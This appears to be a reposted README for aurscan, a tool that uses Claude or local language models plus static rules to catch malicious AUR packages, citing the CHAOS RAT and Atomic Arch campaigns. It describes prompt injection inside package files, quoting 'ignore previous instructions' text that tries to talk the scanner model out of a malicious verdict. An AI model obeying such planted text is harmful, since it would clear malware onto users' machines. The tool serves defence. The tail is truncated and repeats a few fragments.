2026-06-15站内改写6 min readUpdated: 2026-06-15

Manticore-projects/aurscan: Scan AUR packages for malware using Claude LLM

aurscan is a Go tool that scans AUR packages for malicious code before building, using Claude or local LLMs to analyze PKGBUILD files. It combines deterministic static rules with AI judgment to catch supply chain attacks like CHAOS RAT and Atomic Arch. Integrates with yay via a wrapper, supports multiple backends (Claude, API, local models), and fails closed for safety.

SourceHacker News AIAuthor: aiNohY6g

Notifications You must be signed in to change notification settings

Fork 2

Star 34

BranchesTags

Open more actions menu

Folders and files

NameName

Last commit message

Last commit date

Latest commit

History

9 Commits

.github/workflows

cmd/aurscan

internal

packaging

testdata

.gitignore

CHANGELOG.md

LICENSE

Makefile

README.md

go.mod

install.sh

Repository files navigation

Catch malicious AUR packages before they build — with a Claude model reading the PKGBUILD for you.

Reading a PKGBUILD yourself only catches attacks you already recognise. aurscan reads a package's PKGBUILD, .install scriptlets, .SRCINFO and helper scripts before makepkg executes a single line, and blocks the build if the script looks malicious.

It runs in two stages: fast deterministic static rules (offline, zero-cost) catch the known campaign signatures, then a Claude or local model — informed by those rule hits and the package's AUR reputation — makes the judgement call on the subtle cases. With no model configured at all, the static rules alone still produce a fail-closed verdict, so you're protected even fully offline.

Warning

An LLM scanner is a strong extra layer, not a guarantee. Keep building in a clean chroot, prefer official-repo packages, and stay wary of freshly-adopted orphaned packages. See Limitations.

$ syay firefox-patch-bin

scanning firefox-patch-bin (3 files) ...

[ MAL! ] firefox-patch-bin confidence 95% A source labelled "patches" points at a personal GitHub repo unrelated to Firefox and is executed during build — the July 2025 CHAOS RAT vector. [critical] PKGBUILD: Disguised source pulls attacker-controlled code. > patches::git+https://github.com/.../zenbrowser-patch.git ↳ tokens: 12,431 in / 214 out · $0.0413

scanner usage: 1 call(s) · tokens: 12,431 in / 214 out · $0.0413 !! Installation blocked: 1 package(s) flagged MALICIOUS. [A]bort (default) / [r]eport to mailing list & abort / [c]ontinue anyway:

Contents

Why

How it hooks into yay

Install

Authentication

Usage

Token & cost reporting

Configuration

How it stays safe

Project layout

Limitations

Contributing

🎯 Why

In July 2025 the AUR packages firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin were uploaded with a source=() entry disguised as patches that actually pulled a personal GitHub repo and ran CHAOS RAT at build time. They looked like ordinary browser fixes; a quick glance at the PKGBUILD didn't obviously give them away. They were live for ~46 hours.

aurscan is built to flag exactly that class of thing — the unfamiliar trick, not just the one you happen to know.

In June 2026 the Atomic Arch campaign drove the point home at scale: attackers adopted 1,500+ orphaned AUR packages and — in some cases using git commit forgery to impersonate a trusted maintainer — added a post-install step running npm install atomic-lockfile (then bun install js-digest in a second wave), pulling a Rust credential stealer and, when built as root, an eBPF rootkit. The package name and history were unchanged; only the build instructions, and who wrote them, had quietly changed. aurscan's prompt and static rules encode these exact signatures.

🔌 How it hooks into yay

Note

A pacman hook is the wrong layer. PKGBUILD code runs as your user during makepkg, before pacman ever sees a package — so a PreTransaction hook fires only after any build-time payload has already executed. (Hook-based AUR "trust" tools score the maintainer at install time; they can't read what the build script actually does.)

aurscan intercepts at the only safe point — after download, before build — using yay's own editor step. The syay wrapper transparently points yay's editor at aurscan-edit and forces the edit prompt on, so the scanner runs on every AUR PKGBUILD yay is about to build:

You type What gets scanned

syay -S pkg the named package

syay pkg the package you pick from yay's interactive search menu

syay -Syu every AUR upgrade

(any of the above) …and their AUR dependencies, which yay also presents before building

On a clean verdict it chains to your real $VISUAL/$EDITOR, so your manual review still happens. On a non-OK verdict it exits non-zero and yay aborts the build.

📦 Install

git clone https://github.com/manticore-projects/aurscan cd aurscan ./install.sh # build (needs Go) + install into /usr/local/bin

Then make it transparent — fish:

alias yay=syay funcsave yay

bash / zsh

echo "alias yay=syay" >> ~/.bashrc # or ~/.zshrc

This installs three names that are all the same static binary: aurscan (CLI), syay (the yay wrapper), and aurscan-edit (the editor-gate yay invokes).

Task Command

Update git pull && ./install.sh

Uninstall ./install.sh --uninstall

Rootless install SUDO= PREFIX=~/.local ./install.sh

Build only make build

Run tests make test

UPX-pack the binary make compress

Cross-build release artifacts make release

UPX packing (5.4 MB → 1.8 MB) is applied to the release artifacts only — it's deliberately kept out of the AUR PKGBUILD, since Arch users build from source.

🔑 Authentication

Auto-detected, in this order — option 1 needs no API key at all:

Claude Code CLI (claude) in PATH and logged in → uses your existing Claude subscription. Reports exact cost per scan.

ANTHROPIC_API_KEY → direct API (claude-sonnet-4-6 by default). Reports exact tokens; cost computed from a built-in price table.

Local / self-hosted model via AURSCAN_OPENAI_URL → any OpenAI-compatible /chat/completions endpoint (llama.cpp, Ollama, vLLM, LocalAI). Fully private; set AURSCAN_OPENAI_URL_FALLBACK for automatic failover (e.g. GPU host → local CPU). The model is swappable via AURSCAN_OPENAI_MODEL.

AURSCAN_BACKEND=/path/to/cmd → any executable that reads the prompt on stdin and prints the reply on stdout.

No backend at all → static rules still run and block on critical matches.

Local model example (llama.cpp / Ollama)

llama.cpp server, with a fallback to a second host

set -Ux AURSCAN_BACKEND openai set -Ux AURSCAN_OPENAI_URL http://192.168.0.110:18080/v1/chat/completions set -Ux AURSCAN_OPENAI_URL_FALLBACK http://127.0.0.1:18083/v1/chat/completions set -Ux AURSCAN_OPENAI_MODEL qwen2.5-coder-32b

On a slow, CPU-only host (e.g. a handheld), the default 180 s budget can expire before the model finishes — you'll see context deadline exceeded. Raise it and make sure the model's context window is large enough for the prompt (a package is typically several thousand tokens; Ollama's 2048 default will silently truncate it):

set -Ux AURSCAN_TIMEOUT 900 # 15 minutes

and on the Ollama side, give the model real context, e.g.:

ollama run with a Modelfile setting `PARAMETER num_ctx 8192`

Thanks to @alexzk1 for the original connector that this backend generalises.

Choosing a local model — what actually works (and what's too small)

aurscan asks more of a model than autocomplete or chat does. For each package it must (1) reason about possibly-obfuscated shell across a multi-thousand-token prompt, (2) return strictly valid JSON matching the verdict contract, and (3) not be talked out of a verdict by injected "this package is safe / ignore previous instructions" text in the untrusted files. Small models fail all three: they rubber-stamp, emit malformed JSON (→ fail-closed SUSPICIOUS noise), or fall for the injection. Parameter count matters more here than it does for coding assistants.

Rough guidance (names are current as of mid-2026 — check Ollama's library for equivalents, the field moves fast):

Size Examples Verdict for aurscan

≤ 3B qwen2.5-coder:3b, llama3.2:3b, phi-*-mini ❌ Don't. Near-random verdicts, unreliable JSON. Use --rules-only instead.

7–8B codellama:7b (the model in #8), qwen2.5-coder:7b, llama3.1:8b ⚠️ Marginal. Catches only blatant cases; misses subtle supply-chain tricks; JSON sometimes breaks. Independent code-review benchmarks put 7B bug-catch around ~45% — treat it as a weak bonus on top of the static rules, not a real auditor.

14B qwen3:14b, phi-4:14b, deepseek-r1:14b ✅ Usable minimum. Reliable JSON, catches most planted issues (~75%).

32B qwen2.5-coder:32b, qwen3-coder:32b ✅ Recommended sweet spot. Strong code-security reasoning (~85–88% in code-review tests), GPT-4o-class on coding, fits a 24 GB GPU.

70B+ / large MoE llama3.3:70b, qwen3-coder (MoE), gpt-oss:120b ✅ Best local. Approaches cloud quality; 70B-class is the strongest for security analysis specifically.

Approximate VRAM at Q4_K_M (incl. KV-cache headroom): 8B ≈ 6 GB · 14B ≈ 10 GB · 32B ≈ 20–22 GB · 70B ≈ 43 GB. A GPU is strongly recommended for 14B and up.

The two settings people get wrong:

Context window. Ollama defaults to num_ctx 2048, which silently truncates the package out of the prompt — the model then "scans" almost nothing. Set num_ctx ≥ 8192 (16384 recommended). Bake it into a model so the OpenAI-compatible endpoint always uses it:

printf 'FROM qwen2.5-coder:32b\nPARAMETER num_ctx 16384\n' > Modelfile ollama create aurscan-qwen -f Modelfile

set -Ux AURSCAN_BACKEND openai set -Ux AURSCAN_OPENAI_URL http://127.0.0.1:11434/v1/chat/completions set -Ux AURSCAN_OPENAI_MODEL aurscan-qwen

Timeout on slow hardware. CPU-only inference (handhelds, NUCs) runs at a few tokens/sec — a scan can take minutes. Raise the budget: set -Ux AURSCAN_TIMEOUT 900. If that's still painful, drop to a 7–14B model or just run --rules-only.

You are never left unprotected by a weak model: the deterministic static rules always run, and any model error, timeout, or unparseable output fails closed to SUSPICIOUS. A package larger than your context window will also exceed most local models — the static rules still cover it.

Getting an Anthropic API key (option 2)

Create one at console.anthropic.com → Settings → API keys, add billing, then:

set -Ux ANTHROPIC_API_KEY sk-ant-...

A typical scan is a few thousand input tokens — well under a cent on the API, free against a subscription.

🚀 Usage

syay # normal yay usage; the scanner gates AUR builds aurscan [...] # standalone scan (fetches the AUR snapshot in memory) aurscan ./builddir # scan a local build directory aurscan --update-check # audit pending AUR updates without installing anything

When a package is flagged:

Abort — the default; pressing Enter is always safe.

Report — drafts /tmp/aurscan-report-.txt, offers to open your mail client to [email protected] (where the CHAOS RAT cleanup was coordinated), and reminds you to file an AUR deletion request. Never sends automatically.

Continue — requires typing INSTALL, so nothing slips through by reflex.

Exit codes: 0 clean/approved · 1 suspicious-abort · 2 malicious-abort · 3 operational error.

🧩 Customising detection

Add your own auditor guidance. Drop a Markdown file at ~/.config/aurscan/instructions.md (or point AURSCAN_INSTRUCTIONS at any path). Its contents are appended to the built-in instructions — it can sharpen the auditor but never weakens the core rules or the prompt-injection hardening. A ready-to-copy example lives at packaging/instructions.example.md; it tells the auditor to weight low-popularity packages, recent maintainer changes, and changes with no obvious technical reason far more heavily.

Static rules run first. A deterministic catalog (adapted from KiefStudioMA/ks-aur-scanner, GPL-3.0, codes kept compatible) matches known patterns — curl|bash, reverse shells, credential/browser-profile access, systemd persistence, the npm install atomic-lockfile / bun install js-digest campaign signatures, eBPF-rootkit artifacts, and more — offline and for free. Every hit is fed to the model as prior context. Run them alone with no model call:

aurscan --rules-only # or set AURSCAN_RULES_ONLY=1

💸 Token & cost reporting

Every scan prints a per-package usage line an

[truncated for AI cost control]

llama.cpp server, with a fallback to a second host

and on the Ollama side, give the model real context, e.g.:

ollama run with a Modelfile setting PARAMETER num_ctx 8192

ollama run with a Modelfile setting `PARAMETER num_ctx 8192`